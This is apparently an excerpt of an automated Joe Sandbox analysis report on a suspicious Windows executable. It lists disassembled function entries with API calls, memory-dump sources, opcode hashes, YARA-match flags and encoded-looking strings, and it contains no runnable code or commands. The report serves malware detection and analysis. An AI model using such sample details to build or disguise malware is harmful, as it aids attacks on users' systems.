                                                    • Instruction Fuzzy Hash: 9241AD75E00215BBEB11CB99CC8199FBBF9EF89390B244066F901A7216D6719B80CB90
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702285605.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2702285605.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: C:\Users\user\Desktop\3K6rBUOQ2z.exe
                                                    • API String ID: 0-2708042248
                                                    • Opcode ID: 071b538174e6ec2062faa24906a4cfa7e50636e93d54360a723864c0abc3d007
                                                    • Instruction ID: ef1b21c86d4c641325268a2e562e5aacaa8476dc5588200f607cc18d3bf73bc2
                                                    • Opcode Fuzzy Hash: 071b538174e6ec2062faa24906a4cfa7e50636e93d54360a723864c0abc3d007
                                                    • Instruction Fuzzy Hash: A8416471E00214ABCB219B999C85AEFBBF8EFD4350B1440ABF50497251D7B99EC1CB98
                                                    APIs
                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 04B4AE86
                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 04B4AF3A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2704847781.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b40000_3K6rBUOQ2z.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CurrentImageNonwritable___except_validate_context_record
                                                    • String ID: csm
                                                    • API String ID: 3480331319-1018135373
                                                    • Opcode ID: 33bf7593fb2420a6276facfce688e1aeeae85943ba4b5033adcc5dff2c976554
                                                    • Instruction ID: d8fea0a21baf093387e28021d95f836c02d33f5530b8aa594742145cc105e3b7
                                                    • Opcode Fuzzy Hash: 33bf7593fb2420a6276facfce688e1aeeae85943ba4b5033adcc5dff2c976554
                                                    • Instruction Fuzzy Hash: CA41C470A40218ABCF10DF68C884A9EBFB4EF89318F1485D5EC18AB351D735FA15DBA1
                                                    APIs
                                                    • RtlEncodePointer.NTDLL(00000000), ref: 04B4B711
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2704847781.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b40000_3K6rBUOQ2z.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: EncodePointer
                                                    • String ID: MOC$RCC
                                                    • API String ID: 2118026453-2084237596
                                                    • Opcode ID: 16a00d9b10077e87a2e6bda56ac5cedb43e1d1180fe444446107c7dbba074086
                                                    • Instruction ID: 923960378f10a42f4d89f9f1eca47e0f2ee5ca5c2c0ddb50a050844d7370f4e8
                                                    • Opcode Fuzzy Hash: 16a00d9b10077e87a2e6bda56ac5cedb43e1d1180fe444446107c7dbba074086
                                                    • Instruction Fuzzy Hash: 53415871900209AFDF15CF98C881AEEBBB5FF88314F158099FA15A7211D335F950EB50
                                                    APIs
                                                    • EncodePointer.KERNEL32(00000000,?), ref: 100044FB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2705826801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000000.00000002.2705802007.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705853981.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705880835.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_10000000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: EncodePointer
                                                    • String ID: MOC$RCC
                                                    • API String ID: 2118026453-2084237596
                                                    • Opcode ID: ca9cd7b99e72cbf3783ae7526526635f66225abf8acecb3cb58be7c4c4c22851
                                                    • Instruction ID: 0fa13f4c886c2deeb8e1184eea68dc96f9460117e0f406c7378fe553058e7938
                                                    • Opcode Fuzzy Hash: ca9cd7b99e72cbf3783ae7526526635f66225abf8acecb3cb58be7c4c4c22851
                                                    • Instruction Fuzzy Hash: 7B419DB5900109AFEF06CF94CC81AEE7BB5FF48384F168059F9046B25AD736EA50CB55
                                                    APIs
                                                    • RtlEncodePointer.NTDLL(00000000), ref: 0040B4AA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702285605.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2702285605.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: EncodePointer
                                                    • String ID: MOC$RCC
                                                    • API String ID: 2118026453-2084237596
                                                    • Opcode ID: 16a00d9b10077e87a2e6bda56ac5cedb43e1d1180fe444446107c7dbba074086
                                                    • Instruction ID: 67f376c023d9800a5206fdaf198d645220277734bcfb559d46511f35e7f4eabb
                                                    • Opcode Fuzzy Hash: 16a00d9b10077e87a2e6bda56ac5cedb43e1d1180fe444446107c7dbba074086
                                                    • Instruction Fuzzy Hash: 95415871900209AFDF15DF94CD81AAEBBB5EF48308F1480AAFA1576291D3399A50DB98
                                                    APIs
                                                    • __Init_thread_footer.LIBCMT ref: 04CE07BB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000003.1864568328.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_3_4ce0000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: Init_thread_footer
                                                    • String ID: FEKN$NE]D
                                                    • API String ID: 1385522511-517842756
                                                    • Opcode ID: 7d1b909681db53285071ff40672d1c380c008a281c48190cd621e0695607241e
                                                    • Instruction ID: af7ab7e38aa52ae6639d52fbd05c6275cdb13fcaddd4cc79a55e08244c84fa41
                                                    • Opcode Fuzzy Hash: 7d1b909681db53285071ff40672d1c380c008a281c48190cd621e0695607241e
                                                    • Instruction Fuzzy Hash: BA214830B00645CFE720DF2AE845BB937A1FB85308F944269D8541B262EBB53686CBD9
                                                    APIs
                                                      • Part of subcall function 04B493D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B493E2
                                                      • Part of subcall function 04B493D7: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B4941F
                                                    • __Init_thread_footer.LIBCMT ref: 04B41622
                                                      • Part of subcall function 04B4938D: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B49397
                                                      • Part of subcall function 04B4938D: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B493CA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2704847781.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b40000_3K6rBUOQ2z.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                    • String ID: FEKN$NE]D
                                                    • API String ID: 4132704954-517842756
                                                    • Opcode ID: 7d1b909681db53285071ff40672d1c380c008a281c48190cd621e0695607241e
                                                    • Instruction ID: c6b6ce85a24c3fb136392ac9d6bd6c39d7965e59de907ef64728266f1d67071b
                                                    • Opcode Fuzzy Hash: 7d1b909681db53285071ff40672d1c380c008a281c48190cd621e0695607241e
                                                    • Instruction Fuzzy Hash: D3214870B00245CBEB20DF38E849BA977A0EFD5308F9442A9D8141B261EBB57586D7CE
                                                    APIs
                                                      • Part of subcall function 00409170: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 0040917B
                                                      • Part of subcall function 00409170: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 004091B8
                                                    • __Init_thread_footer.LIBCMT ref: 004013BB
                                                      • Part of subcall function 00409126: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00409130
                                                      • Part of subcall function 00409126: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00409163
                                                      • Part of subcall function 00409126: RtlWakeAllConditionVariable.NTDLL ref: 004091DA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702285605.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2702285605.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                    • String ID: FEKN$NE]D
                                                    • API String ID: 2296764815-517842756
                                                    • Opcode ID: 37e1153e5d0601956be4df5595081ba34075aac515f72f9cd57d9b237f69f675
                                                    • Instruction ID: bb411daeb84ba6cc8782813aab56c5dc80a7b29e6052d91cba9c4b608feb04e2
                                                    • Opcode Fuzzy Hash: 37e1153e5d0601956be4df5595081ba34075aac515f72f9cd57d9b237f69f675
                                                    • Instruction Fuzzy Hash: 51215C30B00245CBD720CF29E846BA977B0FB95304F94427AD8542B7A3DBB92586C7DD
                                                    APIs
                                                    • __Init_thread_footer.LIBCMT ref: 04CE712E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000003.1864568328.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_3_4ce0000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: Init_thread_footer
                                                    • String ID: CD^O$_DC[
                                                    • API String ID: 1385522511-3597986494
                                                    • Opcode ID: f117a8599e5a5b64357cd679555c90fdeb56fb08607ed05f2cce84a05c41c654
                                                    • Instruction ID: bd85f991c3c89342e3b2ffa70d6ccece1921f61571a2437b702845afdfd88886
                                                    • Opcode Fuzzy Hash: f117a8599e5a5b64357cd679555c90fdeb56fb08607ed05f2cce84a05c41c654
                                                    • Instruction Fuzzy Hash: 25012130F01304ABC720FF6AAC009B8B3B5FB88304F880279D41857240EB75A9429BEA
                                                    APIs
                                                    • __Init_thread_footer.LIBCMT ref: 04CE6B6E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000003.1864568328.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_3_4ce0000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: Init_thread_footer
                                                    • String ID: CD^O$_DC[
                                                    • API String ID: 1385522511-3597986494
                                                    • Opcode ID: a0a846a2b5bc40eacf458633a07b7fd0d6dae78898cee81696ac0ea38ef941e0
                                                    • Instruction ID: 59acc23c6ae72a031bd4669f738b5fa74ef6f9e6a879dfa4ab37ba94fe350729
                                                    • Opcode Fuzzy Hash: a0a846a2b5bc40eacf458633a07b7fd0d6dae78898cee81696ac0ea38ef941e0
                                                    • Instruction Fuzzy Hash: D1014470F003089BCB20FFA9AD40A78B3B5E708314FC082B9D41857250EB3479419BDA
                                                    APIs
                                                      • Part of subcall function 04B493D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B493E2
                                                      • Part of subcall function 04B493D7: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B4941F
                                                    • __Init_thread_footer.LIBCMT ref: 04B47F95
                                                      • Part of subcall function 04B4938D: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B49397
                                                      • Part of subcall function 04B4938D: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B493CA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2704847781.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b40000_3K6rBUOQ2z.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                    • String ID: CD^O$_DC[
                                                    • API String ID: 4132704954-3597986494
                                                    • Opcode ID: f117a8599e5a5b64357cd679555c90fdeb56fb08607ed05f2cce84a05c41c654
                                                    • Instruction ID: 6d54276575cec01648bb8cdcd8c95df3e6207059145abe7d593a67d09d2ef70c
                                                    • Opcode Fuzzy Hash: f117a8599e5a5b64357cd679555c90fdeb56fb08607ed05f2cce84a05c41c654
                                                    • Instruction Fuzzy Hash: F30126B0B002049BC720EF79BD0099973B4EBC4304F9401B9D12857250DB74B4419BD9
                                                    APIs
                                                      • Part of subcall function 04B493D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B493E2
                                                      • Part of subcall function 04B493D7: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B4941F
                                                    • __Init_thread_footer.LIBCMT ref: 04B479D5
                                                      • Part of subcall function 04B4938D: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B49397
                                                      • Part of subcall function 04B4938D: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B493CA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2704847781.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b40000_3K6rBUOQ2z.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                    • String ID: CD^O$_DC[
                                                    • API String ID: 4132704954-3597986494
                                                    • Opcode ID: a0a846a2b5bc40eacf458633a07b7fd0d6dae78898cee81696ac0ea38ef941e0
                                                    • Instruction ID: afbe0b1e3a5232ec8fc45a5e0e38780b7958d014a02b47b1471e8b13860023b7
                                                    • Opcode Fuzzy Hash: a0a846a2b5bc40eacf458633a07b7fd0d6dae78898cee81696ac0ea38ef941e0
                                                    • Instruction Fuzzy Hash: AA0149B0B00208DBCB20FFB8BD40A5D73B0EB44314F8082EAD11957290DB747441DBC9
                                                    APIs
                                                      • Part of subcall function 00409170: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 0040917B
                                                      • Part of subcall function 00409170: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 004091B8
                                                    • __Init_thread_footer.LIBCMT ref: 00407D2E
                                                      • Part of subcall function 00409126: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00409130
                                                      • Part of subcall function 00409126: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00409163
                                                      • Part of subcall function 00409126: RtlWakeAllConditionVariable.NTDLL ref: 004091DA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702285605.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2702285605.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                    • String ID: CD^O$_DC[
                                                    • API String ID: 2296764815-3597986494
                                                    • Opcode ID: 53c53f0d35d6ef20f9dfb6d629afc077c30de4eaa3ac919fd52d2abd114ead8e
                                                    • Instruction ID: 8bf2ad3165393ed28199ca71651b1e02a490a28405ec2f0c6d2e7b73ba48d91c
                                                    • Opcode Fuzzy Hash: 53c53f0d35d6ef20f9dfb6d629afc077c30de4eaa3ac919fd52d2abd114ead8e
                                                    • Instruction Fuzzy Hash: 1C012630F002059BC720EF6AAD0196973B4FB59300B84017AE5146B282E77899428BDE
                                                    APIs
                                                      • Part of subcall function 00409170: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 0040917B
                                                      • Part of subcall function 00409170: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 004091B8
                                                    • __Init_thread_footer.LIBCMT ref: 0040776E
                                                      • Part of subcall function 00409126: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00409130
                                                      • Part of subcall function 00409126: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00409163
                                                      • Part of subcall function 00409126: RtlWakeAllConditionVariable.NTDLL ref: 004091DA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702285605.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2702285605.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                    • String ID: CD^O$_DC[
                                                    • API String ID: 2296764815-3597986494
                                                    • Opcode ID: 6984f13f36b3e6cee961cec358f898ccc9f9a1464559edccbb98c4c3ae659da9
                                                    • Instruction ID: 44c7e97e152ec1ca5567fde67ff81d8d8e81e117548a1af78ec12ab7f1e6b2a3
                                                    • Opcode Fuzzy Hash: 6984f13f36b3e6cee961cec358f898ccc9f9a1464559edccbb98c4c3ae659da9
                                                    • Instruction Fuzzy Hash: 64012670F002089BC720FF69AD41A5973B0E708350F80827EE5196B292EB786941CBCA
                                                    APIs
                                                    • __Init_thread_footer.LIBCMT ref: 04CE6519
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000003.1864568328.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_3_4ce0000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: Init_thread_footer
                                                    • String ID: DCDO$EDO*
                                                    • API String ID: 1385522511-3480089779
                                                    • Opcode ID: 8b51cd775da556fe0e8da68bd1a71e78c45c54a650ae96054a820cef77246584
                                                    • Instruction ID: 9a4274da65ab94f9fbd0f34c1431bece6a73b280ecacf18095417aab1c032893
                                                    • Opcode Fuzzy Hash: 8b51cd775da556fe0e8da68bd1a71e78c45c54a650ae96054a820cef77246584
                                                    • Instruction Fuzzy Hash: 8D01D6B0B023089FD720EFA5E88156CB7B1E704304FD04579CE0597350DB347A818B99
                                                    APIs
                                                    • __Init_thread_footer.LIBCMT ref: 04CE6629
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000003.1864568328.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_3_4ce0000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: Init_thread_footer
                                                    • String ID: DCDO$^]E*
                                                    • API String ID: 1385522511-2708296792
                                                    • Opcode ID: 39631913317fdbbebfa06f582ff08a226458685357f22e00fc86a48f968bd657
                                                    • Instruction ID: 6848e15de3996628be23f43624e09a179a0b14696eba4def435a4b9af94f50d0
                                                    • Opcode Fuzzy Hash: 39631913317fdbbebfa06f582ff08a226458685357f22e00fc86a48f968bd657
                                                    • Instruction Fuzzy Hash: AE01AD70B00208EFD720EF68E94256CBBB1EB04304F84417AC90997394DF357A118B99
                                                    APIs
                                                      • Part of subcall function 04B493D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B493E2
                                                      • Part of subcall function 04B493D7: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B4941F
                                                    • __Init_thread_footer.LIBCMT ref: 04B47490
                                                      • Part of subcall function 04B4938D: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B49397
                                                      • Part of subcall function 04B4938D: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B493CA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2704847781.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b40000_3K6rBUOQ2z.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                    • String ID: DCDO$^]E*
                                                    • API String ID: 4132704954-2708296792
                                                    • Opcode ID: 39631913317fdbbebfa06f582ff08a226458685357f22e00fc86a48f968bd657
                                                    • Instruction ID: 6f4b96e39770c75f6dbf9a5ad1d2e765e7569c03ea8a6f485ed5ebe238ee9a96
                                                    • Opcode Fuzzy Hash: 39631913317fdbbebfa06f582ff08a226458685357f22e00fc86a48f968bd657
                                                    • Instruction Fuzzy Hash: 2A01ADB0B00208ABCB20EF68E98256DBBB0EB44314F8401BAC91957390CB35B9109F89
                                                    APIs
                                                      • Part of subcall function 04B493D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B493E2
                                                      • Part of subcall function 04B493D7: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B4941F
                                                    • __Init_thread_footer.LIBCMT ref: 04B47380
                                                      • Part of subcall function 04B4938D: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B49397
                                                      • Part of subcall function 04B4938D: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B493CA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2704847781.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b40000_3K6rBUOQ2z.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                    • String ID: DCDO$EDO*
                                                    • API String ID: 4132704954-3480089779
                                                    • Opcode ID: 8b51cd775da556fe0e8da68bd1a71e78c45c54a650ae96054a820cef77246584
                                                    • Instruction ID: f8e536f69ee61ca72cfba216928ad109341b111eb874ba451fd152c23f1c1cb4
                                                    • Opcode Fuzzy Hash: 8b51cd775da556fe0e8da68bd1a71e78c45c54a650ae96054a820cef77246584
                                                    • Instruction Fuzzy Hash: 0F01D6F0B013089FDB10DF64E98159DB7B0EB85304F9041F9CA15573A0CB347981DB89
                                                    APIs
                                                      • Part of subcall function 00409170: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 0040917B
                                                      • Part of subcall function 00409170: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 004091B8
                                                    • __Init_thread_footer.LIBCMT ref: 00407119
                                                      • Part of subcall function 00409126: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00409130
                                                      • Part of subcall function 00409126: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00409163
                                                      • Part of subcall function 00409126: RtlWakeAllConditionVariable.NTDLL ref: 004091DA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702285605.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2702285605.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                    • String ID: DCDO$EDO*
                                                    • API String ID: 2296764815-3480089779
                                                    • Opcode ID: 057ee43e4521391655df31a4c43a3f0a7f6c0038db3df444a4ed800121ff4de1
                                                    • Instruction ID: 6e88f7cd3849569d85f07cd18ee47690fbb1a730dcdea08f10a2250dba35ba50
                                                    • Opcode Fuzzy Hash: 057ee43e4521391655df31a4c43a3f0a7f6c0038db3df444a4ed800121ff4de1
                                                    • Instruction Fuzzy Hash: 1F0186B0F01208AFC710DF55E98255DB7B0E705304F90457ADA15AB3D1DB386D95CB8D
                                                    APIs
                                                      • Part of subcall function 00409170: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 0040917B
                                                      • Part of subcall function 00409170: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 004091B8
                                                    • __Init_thread_footer.LIBCMT ref: 00407229
                                                      • Part of subcall function 00409126: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00409130
                                                      • Part of subcall function 00409126: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00409163
                                                      • Part of subcall function 00409126: RtlWakeAllConditionVariable.NTDLL ref: 004091DA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702285605.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2702285605.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                    • String ID: DCDO$^]E*
                                                    • API String ID: 2296764815-2708296792
                                                    • Opcode ID: da9be0c5e5273d7ee2d012b34ad58f6f2e7d462380927887947c71f03af37cc5
                                                    • Instruction ID: 8efc7060af64cb8acb1af25de2c4b339d239c6825e953d18f5e204f1a235d67b
                                                    • Opcode Fuzzy Hash: da9be0c5e5273d7ee2d012b34ad58f6f2e7d462380927887947c71f03af37cc5
                                                    • Instruction Fuzzy Hash: 8F016D70F002089BC720EF68E94295DB7B0EB08304F9441BEE919A7396DB3969158BCE